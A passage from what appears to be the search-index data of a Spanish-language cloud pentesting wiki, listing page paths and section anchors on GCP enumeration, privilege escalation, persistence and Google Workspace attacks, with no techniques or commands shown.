/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.html#vpc-subredes-y-firewalls-en-gcp","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.html#subredes","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.html#firewalls","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.html#políticas-de-firewall-jerárquicas","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.html#evaluación-de-reglas-de-firewall","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.html#emparejamiento-de-redes-vpc","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.html#referencias","pentesting-cloud/gcp-security/gcp-services/gcp-composer-enum.html#gcp---composer-enum","pentesting-cloud/gcp-security/gcp-services/gcp-composer-enum.html#información-básica","pentesting-cloud/gcp-security/gcp-services/gcp-composer-enum.html#enumeración","pentesting-cloud/gcp-security/gcp-services/gcp-composer-enum.html#privesc","pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.html#gcp---contenedores-y-enumeración-de-gke","pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.html#contenedores","pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.html#privesc","pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.html#node-pools","pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.html#kubernetes","pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.html#escalación-de-privilegios-de-tls-bootstrap","pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.html#secretos-en-la-api-de-kubelet","pentesting-cloud/gcp-security/gcp-services/gcp-dataproc-enum.html#gcp----dataproc-enum","pentesting-cloud/gcp-security/gcp-services/gcp-dataproc-enum.html#información-básica","pentesting-cloud/gcp-security/gcp-services/gcp-dataproc-enum.html#componentes","pentesting-cloud/gcp-security/gcp-services/gcp-dataproc-enum.html#enumeración","pentesting-cloud/gcp-security/gcp-services/gcp-dataproc-enum.html#enumeración-de-clústeres","pentesting-cloud/gcp-security/gcp-services/gcp-dataproc-enum.html#enumeración-de-trabajos","pentesting-cloud/gcp-security/gcp-services/gcp-dataproc-enum.html#privesc","pentesting-cloud/gcp-security/gcp-services/gcp-dns-enum.html#gcp---dns-enum","pentesting-cloud/gcp-security/gcp-services/gcp-dns-enum.html#gcp---cloud-dns","pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.html#gcp---filestore-enum","pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.html#información-básica","pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.html#conexiones","pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.html#copias-de-seguridad","pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.html#cifrado","pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.html#enumeración","pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.html#escalamiento-de-privilegios-y-post-explotación","pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.html#persistencia","pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.html#gcp---firebase-enum","pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.html#firebase","pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.html#enumeración-no-autenticada","pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.html#enum-autenticado","pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.html#acceder-a-la-información-con-appid-y-api-key","pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.html#referencias","pentesting-cloud/gcp-security/gcp-services/gcp-firestore-enum.html#gcp---firestore-enum","pentesting-cloud/gcp-security/gcp-services/gcp-firestore-enum.html#cloud-firestore","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#gcp---iam-principales-y-enumeración-de-políticas-de-org","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#cuentas-de-servicio","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#enumeración","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#usuarios-y-grupos","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#enumeración-1","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#iam","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#permisos-predeterminados","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#set-iam-policy-vs-add-iam-policy-binding","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#enumeración-2","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#cloudasset-iam-enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#testiampermissions-enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#privesc","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#unauthenticated-enum","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#post-exploitation","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#persistence","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#org-policies","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#privesc-1","pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.html#gcp---kms-enum","pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.html#kms","pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.html#nivel-de-protección-de-claves","pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.html#propósitos-de-las-claves","pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.html#período-de-rotación-y-período-programado-para-destrucción","pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.html#versión-primaria","pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.html#enumeración","pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.html#escalación-de-privilegios","pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.html#post-explotación","pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.html#referencias","pentesting-cloud/gcp-security/gcp-services/gcp-logging-enum.html#gcp---logging-enum","pentesting-cloud/gcp-security/gcp-services/gcp-logging-enum.html#información-básica","pentesting-cloud/gcp-security/gcp-services/gcp-logging-enum.html#flujo-de-registros","pentesting-cloud/gcp-security/gcp-services/gcp-logging-enum.html#configuraciones-soportadas-por-gcp-logging","pentesting-cloud/gcp-security/gcp-services/gcp-memorystore-enum.html#gcp---enumeración-de-memorystore","pentesting-cloud/gcp-security/gcp-services/gcp-memorystore-enum.html#memorystore","pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.html#gcp---enumeración-de-monitoreo","pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.html#información-básica","pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.html#políticas","pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.html#tableros","pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.html#canales","pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.html#snoozers","pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.html#enumeración","pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.html#post-explotación","pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.html#referencias","pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.html#gcp---enum-de-pubsub","pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.html#pubsub","pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.html#instantáneas-y-esquemas","pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.html#enumeración","pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.html#escalamiento-de-privilegios-y-post-explotación","pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.html#pubsub-lite","pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.html#enumeración-1","pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.html#gcp---enumeración-de-secrets-manager","pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.html#secret-manager","pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.html#enumeración","pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.html#escalamiento-de-privilegios","pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.html#post-explotación","pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.html#persistencia","pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.html#uso-indebido-de-la-rotación","pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.html#gcp---enumeración-de-seguridad","pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.html#información-básica","pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.html#centro-de-comando-de-seguridad","pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.html#amenazas","pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.html#enumeración","pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.html#post-explotación","pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.html#detecciones-y-controles","pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.html#protección-de-datos","pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.html#zero-trust","pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.html#gcp---source-repositories-enum","pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.html#basic-information","pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.html#offsec-information","pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.html#open-in-cloud-shell","pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.html#privilege-escalation--post-exploitation","pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.html#unauthenticated-enum","pentesting-cloud/gcp-security/gcp-services/gcp-spanner-enum.html#gcp---enumeración-de-spanner","pentesting-cloud/gcp-security/gcp-services/gcp-spanner-enum.html#cloud-spanner","pentesting-cloud/gcp-security/gcp-services/gcp-stackdriver-enum.html#gcp---stackdriver-enum","pentesting-cloud/gcp-security/gcp-services/gcp-stackdriver-enum.html#stackdriver-logging","pentesting-cloud/gcp-security/gcp-services/gcp-stackdriver-enum.html#referencias","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#gcp---enumeración-de-almacenamiento","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#almacenamiento","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#tipos-de-almacenamiento","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#control-de-acceso","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#versionado","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#política-de-retención","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#cifrado","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#acceso-público","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#claves-hmac","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#enumeración","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#escalación-de-privilegios","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#enumeración-no-autenticada","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#post-explotación","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#persistencia","pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.html#gcp---workflows-enum","pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.html#información-básica","pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.html#cifrado","pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.html#enumeración","pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.html#privesc-y-post-explotación","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#gcp--workspace-pivoting","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#de-gcp-a-gws","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#conceptos-básicos-de-delegación-a-nivel-de-dominio","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#compromiso-de-la-delegación-existente","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#crear-una-nueva-delegación-persistencia","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#creando-un-proyecto-para-enumerar-workspace","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#abusando-de-las-credenciales-de-gcloud","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#de-gws-a-gcp","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#acceso-a-usuarios-privilegiados-de-gcp","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#escalación-de-privilegios-en-google-groups","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#referencias","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/gcp-understanding-domain-wide-delegation.html#gcp---comprendiendo-la-delegación-de-dominio-amplio","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/gcp-understanding-domain-wide-delegation.html#comprendiendo-la-delegación-de-dominio-amplio","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/gcp-understanding-domain-wide-delegation.html#delegación-de-dominio-amplio-detrás-de-escena","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/index.html#gcp---enumeración-y-acceso-no-autenticado","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/index.html#descubrimiento-de-activos-públicos","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/index.html#fuerza-bruta-de-recursos-públicos","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/index.html#buckets-firebase-apps-y-cloud-functions","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.html#gcp---enumeración-no-autenticada-de-claves-api","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.html#claves-api","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.html#técnicas-osint","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.html#verificar-el-proyecto-gcp-de-origen---apikeyskeyslookup","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.html#fuerza-bruta-en-endpoints-de-api","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-app-engine-unauthenticated-enum.html#gcp---enumeración-no-autenticada-de-app-engine","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-app-engine-unauthenticated-enum.html#app-engine","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-app-engine-unauthenticated-enum.html#fuerza-bruta-de-subdominios","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-artifact-registry-unauthenticated-enum.html#gcp---enumeración-no-autenticada-del-registro-de-artefactos","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-artifact-registry-unauthenticated-enum.html#registro-de-artefactos","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-artifact-registry-unauthenticated-enum.html#confusión-de-dependencias","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.html#gcp---enumeración-no-autenticada-de-cloud-build","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.html#cloud-build","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.html#cloudbuildyml","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.html#aprobaciones-de-pr","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.html#gcp---enumeración-no-autenticada-de-cloud-functions","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.html#cloud-functions","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.html#fuerza-bruta-de-urls","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.html#enumerar-cloud-functions-abiertas","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.html#gcp---cloud-run-enumeración-no-autenticada","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.html#cloud-run","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.html#enumerar-cloud-run-abiertos","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.html#gcp---enumeración-no-autenticada-de-cloud-sql","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.html#cloud-sql","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.html#fuerza-bruta","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.html#gcp---enumeración-no-autenticada-de-compute","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.html#compute","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.html#ssrf---falsificación-de-solicitudes-del-lado-del-servidor","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.html#servicios-expuestos-vulnerables","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-iam-principals-and-org-unauthenticated-enum.html#gcp---iam-principales-y-enum-unauthenticated-de-org","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-iam-principals-and-org-unauthenticated-enum.html#iam-y-principales-de-gcp","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-iam-principals-and-org-unauthenticated-enum.html#se-utiliza-el-dominio-en-workspace","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-iam-principals-and-org-unauthenticated-enum.html#enumerar-correos-electrónicos-y-cuentas-de-servicio","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.html#gcp---enumeración-no-autenticada-de-repositorios-de-código","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.html#repositorios-de-código","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.html#compromiso-de-repositorio-externo","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/index.html#gcp---almacenamiento-enumeración-no-autenticada","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/index.html#almacenamiento","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/index.html#fuerza-bruta-de-cubos-públicos","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/index.html#buscar-cubos-abiertos-en-la-cuenta-actual","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.html#gcp---escalación-de-privilegios-en-buckets-públicos","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.html#escalación-de-privilegios-en-buckets","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.html#verificar-permisos","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.html#escalando","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.html#referencias","pentesting-cloud/workspace-security/index.html#gws---pentesting-de-workspace","pentesting-cloud/workspace-security/index.html#puntos-de-entrada","pentesting-cloud/workspace-security/index.html#phishing-en-plataformas-de-google-y-apps-de-oauth","pentesting-cloud/workspace-security/index.html#password-spraying","pentesting-cloud/workspace-security/index.html#post-explotación","pentesting-cloud/workspace-security/index.html#gws--gcp-pivoting","pentesting-cloud/workspace-security/index.html#gws--gcpw--gcds--sincronización-de-directorios-ad--entraid","pentesting-cloud/workspace-security/index.html#persistencia","pentesting-cloud/workspace-security/index.html#recuperación-de-cuenta-comprometida","pentesting-cloud/workspace-security/index.html#referencias","pentesting-cloud/workspace-security/gws-post-exploitation.html#gws---post-explotación","pentesting-cloud/workspace-security/gws-post-exploitation.html#google-groups-privesc","pentesting-cloud/workspace-security/gws-post-exploitation.html#acceso-a-la-información-de-correo-de-grupos","pentesting-cloud/workspace-security/gws-post-exploitation.html#gcp--gws-pivoting","pentesting-cloud/workspace-security/gws-post-exploitation.html#takeout---descargar-todo-lo-que-google-sabe-sobre-una-cuenta","pentesting-cloud/workspace-security/gws-post-exploitation.html#vault---descargar-todos-los-datos-de-workspace-de-los-usuarios","pentesting-cloud/workspace-security/gws-post-exploitation.html#descarga-de-contactos","pentesting-cloud/workspace-security/gws-post-exploitation.html#cloudsearch","pentesting-cloud/workspace-security/gws-post-exploitation.html#google-chat","pentesting-cloud/workspace-security/gws-post-exploitation.html#minería-de-google-drive","pentesting-cloud/workspace-security/gws-post-exploitation.html#keep-notes","pentesting-cloud/workspace-security/gws-post-exploitation.html#modificar-app-scripts","pentesting-cloud/workspace-security/gws-post-exploitation.html#administrar-workspace","pentesting-cloud/workspace-security/gws-post-exploitation.html#referencias","pentesting-cloud/workspace-security/gws-persistence.html#gws---persistencia","pentesting-cloud/workspace-security/gws-persistence.html#persistencia-en-gmail","pentesting-cloud/workspace-security/gws-persistence.html#contraseñas-de-aplicaciones","pentesting-cloud/workspace-security/gws-persistence.html#cambiar-2-fa-y-similar","pentesting-cloud/workspace-security/gws-persistence.html#persistencia-a-través-de-aplicaciones-oauth","pentesting-cloud/workspace-security/gws-persistence.html#persistencia-a-través-de-delegación","pentesting-cloud/workspace-security/gws-persistence.html#persistencia-a-través-de-la-aplicación-de-android","pentesting-cloud/workspace-security/gws-persistence.html#persistencia-a-través-de--scripts-de-aplicaciones","pentesting-cloud/workspace-security/gws-persistence.html#referencias","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/index.html#gws---ataques-de-sincronización-de-workspace-gcpw-gcds-gps-sincronización-de-directorios-con-ad-y-entraid","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/index.html#gcpw---proveedor-de-credenciales-de-google-para-windows","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/index.html#gcsd---sincronización-de-directorios-de-google-cloud","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/index.html#gps---sincronización-de-contraseñas-de-google","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/index.html#sincronización-de-directorios-de-admin","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gws-admin-directory-sync.html#gws---sincronización-del-directorio-de-administradores","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gws-admin-directory-sync.html#información-básica","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gws-admin-directory-sync.html#de-adentraid---google-workspace--gcp","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gws-admin-directory-sync.html#de-google-workspace---adentraid","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcds-google-cloud-directory-sync.html#gcds---google-cloud-directory-sync","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcds-google-cloud-directory-sync.html#información-básica","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcds-google-cloud-directory-sync.html#gcds---tokens-de-disco-y-credenciales-de-ad","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcds-google-cloud-directory-sync.html#gcds---volcando-tokens-de-la-memoria","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcds-google-cloud-directory-sync.html#gcds---generando-tokens-de-acceso-a-partir-de-tokens-de-actualización","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcds-google-cloud-directory-sync.html#gcds---alcances","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#gcpw---google-credential-provider-for-windows","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#información-básica","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#gcpw---mitm","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#gcpw---huella-digital","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#gcpw---obtener-tokens","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#gcpw---refresh-tokens-del-registro","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#gcpw---tokens-de-actualización-de-disco","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#gcpw---extracción-de-tokens-de-la-memoria-de-procesos","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#gcpw---generación-de-tokens-de-acceso-a-partir-de-tokens-de-actualización","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#gcpw---alcances","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#gcpw---recuperando-la-contraseña-en-texto-claro","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#referencias","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.html#gps---google-password-sync","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.html#información-básica","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.html#gps---configuración","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.html#gps---extracción-de-contraseña-y-token-del-disco","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.html#gps---extracción-de-tokens-de-la-memoria","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.html#gps---generando-tokens-de-acceso-a-partir-de-tokens-de-actualización","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.html#gps---scopes","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#gws---phishing-en-plataformas-de-google","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#metodología-genérica-de-phishing","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#phishing-en-google-groups","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#phishing-en-google-c